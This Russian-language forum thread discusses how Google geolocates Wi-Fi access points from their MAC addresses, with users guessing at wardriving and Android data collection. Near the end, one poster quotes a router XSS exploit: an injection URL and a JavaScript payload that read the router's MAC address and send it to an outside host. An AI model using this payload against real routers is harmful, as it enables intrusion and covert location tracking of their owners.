Определение положения wi-fi сети гуглом

BrAB> вбиваете мак своей wi-fi точки - и с некоторой вероятностью она показывает с точностью до дома. Меня эта штука нашла - с точностью до дома.


вбил.
нашла показала недалеко от места старого офиса.
а мы оттудова в августе уже как съехали

и провайдер другой

Cormorant> а мы оттудова в августе уже как съехали
Cormorant> и провайдер другой

Значит, точно запоминает после первого определения. И критерии обновления не проработали ещё

Balancer>> Да, прикольно. Дом определился
BrAB> есть более подробные идеи - как? и нет ли знакомых в других городах с wi-fi? интересно - работает ли это там
Ахренеть, в Рязани показал с отклонением метров в 10

Вы тут говорите об определении координат на основе времени прохождения пакетов с известных точек. Но ... как жеж они умудряются "пингануть" меня по MAC адресу, задается ведь не IP, а MAC. При этом у меня параноидальная настройка точки доступа с контролем доступа по МАС-у и ограничением числа подключений.

У меня только лишь одно предположение, что данные о МАС и координатах получены с передвижного сканера, по моему вардрайвинг называется, но блин неужели гугл катался по Рязани !!!?

Floyd> Вы тут говорите об определении координат на основе времени прохождения пакетов с известных точек. Но ... как жеж они умудряются "пингануть" меня по MAC адресу, задается ведь не IP, а MAC.

А зачем нужен именно IP? Достаточно 802.11 с MAC и SSID. Без установки соединения.

Floyd>> Вы тут говорите об определении координат на основе времени прохождения пакетов с известных точек. Но ... как жеж они умудряются "пингануть" меня по MAC адресу, задается ведь не IP, а MAC.
Kernel3> А зачем нужен именно IP? Достаточно 802.11 с MAC и SSID. Без установки соединения.

Т.е. ты думаешь что вокруг меня стоят фиксированные WiFi точки которые постоянно сканируют весь диапазон? Маловероятно, особенно с учетом этого:

вбил.
нашла показала недалеко от места старого офиса.
а мы оттудова в августе уже как съехали

и провайдер другой

 

Floyd> Т.е. ты думаешь что вокруг меня стоят фиксированные WiFi точки которые постоянно сканируют весь диапазон? Маловероятно, особенно с учетом этого:

А прочитать всю тему внимательно?

Kernel3> А прочитать всю тему внимательно?

Нэверю ! Имхо это данные с мобильного сканера.

Balancer> Чисто по GPS... Дом - точный адрес. Работа - примерный район.

и номер квартиры?

hnick> и номер квартиры?

Это пока им не по силам. Но технологии не стоят на месте, да...

BrAB>> и нет ли знакомых в других городах с wi-fi? интересно - работает ли это там
Татарин> В Таллине работает.
Татарин> Но меня несколько напугало другое: эта же скотина точно (с точностью до 20м, до подъезда, а у меня в подъезде четыре квартиры) определила местоположение моего стационарного компа. Это означает, мой провайдер сливает мои точные координаты моего клиентского оборудования напрямую в гугл, со всеми вытекающими.

Сумлеваюсь я чо то. Скорее я поверю, что гуглемобиль когда ездит, собирает информацию о встреченных wi-fi-ях. А когда информации по вай-фаю не найдено (тока купленный), то тогда смотрит по IP. Получается грубее, конечно.

Сергей-4030> Скорее я поверю, что гуглемобиль когда ездит

Что-то я не уверен, что гуглемобиль раскатывает по российским городам, да ещё достаточно регулярно

Скорее всего, как было раньше предположен, роль гуглесканера выполняют юзеры с Андроидами при разрешении в нём соответствующей опции.

Cormorant> и провайдер другой

Во, ЧТД. Однажды вай-фай засканировали и теперь показывают. Между прочим, это ведь не проблема, извините. Наняли такси, поставили приемник и ездите по городу, ловите APы. Или даже в с еачальством таксопарка/автобусного/трамайного депо договорились и положили в автобус рейсовый коробку.

Сергей-4030>> Скорее я поверю, что гуглемобиль когда ездит
Balancer> Что-то я не уверен, что гуглемобиль раскатывает по российским городам, да ещё достаточно регулярно

На нем не обязательно написано "гуглемобиль". А так - не вижу проблемы.

Balancer> Скорее всего, как было раньше предположен, роль гуглесканера выполняют юзеры с Андроидами при разрешении в нём соответствующей опции.

Да, так, конечно, тоже можно.

Сергей-4030> А так - не вижу проблемы.

Проблема в том, что гуглемобиль далеко не во все дворы элементарно въедет. А уже с той же Ленинградки, мало того, что до моего дома, скажем, вряд ли дотянется (а пешеходы проходят раза в четыре ближе), так ещё расстояние будет таким, что уже возможна путаница, с какой стороны дороги ловится сигнал.

Практика же показывает, что угадывается результат у многих очень уж хорошо

Balancer> Практика же показывает, что угадывается результат у многих очень уж хорошо

Согласен, Андроидами сканить удобнее, да. На самом деле интересно, как оно все ложится на законы.

Balancer> Скорее всего, как было раньше предположен, роль гуглесканера выполняют юзеры с Андроидами при разрешении в нём соответствующей опции.
Нет там таких опций... так что без разрешения владельцев, похоже.

Да, идея, конечно мощная (практически - идеальный способ), но осадочек... гм, да.

Татарин> Нет там таких опций...

Народ говорил, что есть То ли когда Wi-Fi включаешь, то ли ещё что-то - запрашивает, мол, можно ли Гуглю отсылать данные. Правда, именно про определение сторонних Wi-Fi точек прямо не говорится, но под вопрос подходит

Понятно, что это с чужих слов, у самого Андроида нет пока.

Balancer> Народ говорил, что есть То ли когда Wi-Fi включаешь, то ли ещё что-то - запрашивает, мол, можно ли Гуглю отсылать данные.
Сейчас вот перерыл всё - не нашёл.

Но зато прочитал соглашение о конфиденциальности Гугл, и там это оговорено.

Татарин> Сейчас вот перерыл всё - не нашёл.

В какой-то теме, где это обсуждалось, народ явно упоминал запрос с подтверждением Но где - сейчас не нагуглил.

Татарин> Но зато прочитал соглашение о конфиденциальности Гугл, и там это оговорено.

Зато, вот, попались отзывы, понижающие вероятность использования гуглемобиля:

я сильно сомневаюсь, что до моего зажопинска (1500 километров от ДС) уже добрались гугломашины. вариант с тем, что MAC-адреса WiFi точек собирают гугло-карты (которые к тому же по GPS и по сотовой сети определяют координаты) более правдоподобен.

...

Почему сервис определил точку доступа, которая ходит в и-нет, через роутер, которого в базе нет? Физическое сканирование города? Пативен заезжает даже в переулки спального района?

...

К тому же с абсолютно любой дороги мой WiFi не поймать, роутер стоит в глубине квартиры, не особо мощный и на ноуте, напримре, не ловится даже под окнами или в подъезде.

 

Сергей-4030> Сумлеваюсь я чо то. Скорее я поверю, что гуглемобиль когда ездит, собирает информацию о встреченных wi-fi-ях. А когда информации по вай-фаю не найдено (тока купленный), то тогда смотрит по IP. Получается грубее, конечно.

Тут совокупность. У Браба в первом посте ссылочка на сайт с объяснениями...
Первое XSS injection с Ajax — почему с Ajax — это просто такой объект в JavaScripte, который позволяет организовавыть сессию (и с довольно высоким уровнем — можно на уровне HTTP, можно на уровне XML, можно свой протокол) в невидимом режиме. Я в PNC банке так данные передавал в LendingTree, местные вещи, в том числе для всяких DealerTrack и RouteOne. Более того, Amazon продаёт банкам инфу, где привязан настоящий платёжный адрес к IP адресу. Далее, суть состоит в том, что сайт посылает тебе HTML с JavaScript Code в котором стоит этот скрипт. Потом это скрипт коммуникирует с раутером, поставляя ему в URL ещё один JavaScript — у Сэма есть такая ссылочка:

1. http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E

Заметь на строчки между словечками script. Сам скрипт выглядит так:

1. var xmlhttp =  new XMLHttpRequest();
2. xmlhttp.open('GET', '/index.cgi?active%5fpage=9124&req%5fmode=0&mimic%5fbutton%5ffield=goto%3a+9124%2e%2e&button%5fvalue=9124', true);
3. xmlhttp.onreadystatechange = function() {
4.         if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
5.         {
6.                 var mac = xmlhttp.responseText.substr(xmlhttp.responseText.indexOf('00:21:63'), 17);
7.                 mac = mac.replace(/:/g, '-');
8.                 document.location = 'http://samy.pl/mapxss/fiosmap.php?mac=' + mac;
9.         }
10. }
11. xmlhttp.send();

Такой простенький Ajax c XMLHttpRequest объектом — основой Ajax-а. И этот скрипт уже инжектет внутрь сервера на раутере, если он XSS vulnerable, в этот момент уже пофиг, если раутер спрашивает пароль. Скрипту это уже не надо. Скрипт получает MAC Address. А потом в дело вступает Гугль.
У Гугля есть те самые автомобили, которые ты упомнул. Плюс гугль использует базу от хаккеров, которые выполнили mapping WiFi на адреса. По США почти полные карты доступны. Очень много сделано по Европе, России, Китаю и Австралии. Но не всё. Такие базы можно найти на разных сайтах. Mapping Wireless Routers

Кроме того, у Гугла стоят разные точки во многих местах с известным адресом. Ну и пользуются они открытыми, вроде, тоже. Хотя тут я на 100 процентов не уверен. Далее, как уже давал ссылку Kernel3 — с разных открытых точек можно померить силу сигнала. Ну и с андроидов можно снимать силу сигнала и MAC адреса доступных WiFi, которые кладутся в БД. Всё. Никакой фантастики, только методичный сбор инфы и её обработка. Да у имена у многих провов больших у промежуточных раутеров соотвествтующие. Например:

1. C:\>tracert www.google.com
2.  
3. Tracing route to www.l.google.com [72.14.204.103]
4. over a maximum of 30 hops:
5.  
6.   1     1 ms    <1 ms    <1 ms  Wireless_Broadband_Router.home [192.168.1.1]
7.   2    24 ms     4 ms     4 ms  L100.PITBPA-VFTTP-34.verizon-gni.net [173.75.30.1]
8.   3    13 ms     4 ms     4 ms  G1-0-7-334.PITBPA-LCR-03.verizon-gni.net [130.81.140.106]
9.   4    12 ms    11 ms    12 ms  so-15-3-0-0.LCC1-RES-BB-RTR1-RE1.verizon-gni.net [130.81.28.204]
10.   5    17 ms    17 ms    24 ms  0.so-3-2-0.XT1.DCA6.ALTER.NET [152.63.39.169]
11.   6    27 ms    14 ms    14 ms  0.xe-7-0-2.XL3.IAD8.ALTER.NET [152.63.32.230]
12.   7    15 ms    14 ms    24 ms  TenGigE0-6-1-0.GW7.IAD8.ALTER.NET [152.63.32.194]
13.   8    67 ms    47 ms    49 ms  google-gw.customer.alter.net [152.179.50.106]
14.   9    19 ms    14 ms    14 ms  216.239.46.248
15.  10   184 ms    23 ms    24 ms  66.249.94.46
16.  11    15 ms    17 ms    14 ms  iad04s01-in-f103.1e100.net [72.14.204.103]
17.  
18. Trace complete.
19.  
20. C:\>

Точки 2 и 3 тебе ничего не напоминают? PITBPA — Pittsburgh, Bethel Park. VFTTP указывает на конкретный район, который обслуживается конкретным концентратором. В точке 4 RES обозначает Residential. Бизнес ребята имеют другое расширение. Данные я собрал, работая напрямую с routing group, которой помогал выгрести ошибки. Так сказать, social engineering.

Mishka>Более того, Amazon продаёт банкам инфу, где привязан настоящий платёжный адрес к IP адресу.

Вот об этом я вовсе не думал. По этому, да, можно детализировать очень серьезно. Когда я на айпаде смотрю карту, мое местоположение находится с точностью до дома (т.е. метров 40 максимум). Конкретно меня обнаруживают в доме соседа. Да и по всему прочему - даже и не думаешь поначалу о таких штуках.

Сергей-4030> Вот об этом я вовсе не думал. По этому, да, можно детализировать очень серьезно. Когда я на айпаде смотрю карту, мое местоположение находится с точностью до дома (т.е. метров 40 максимум). Конкретно меня обнаруживают в доме соседа. Да и по всему прочему - даже и не думаешь поначалу о таких штуках.

Ну, на этом строилась одна из фич fraud protection. Как раз делали, когда я ушёл. Точнее ещё делают. Всякое application for credit через это прогоняют. А то тут местная китайская мафия изобрела способ — приходила к китайцам и засталяла их брать кредиты под дулом пистолета, забирали деньги, а люди потом платили. Поймали на том, что с одного адреса пришло несколько апликаций на разные имена. Стукнули в ФБР. Тех быстренько оприходовали.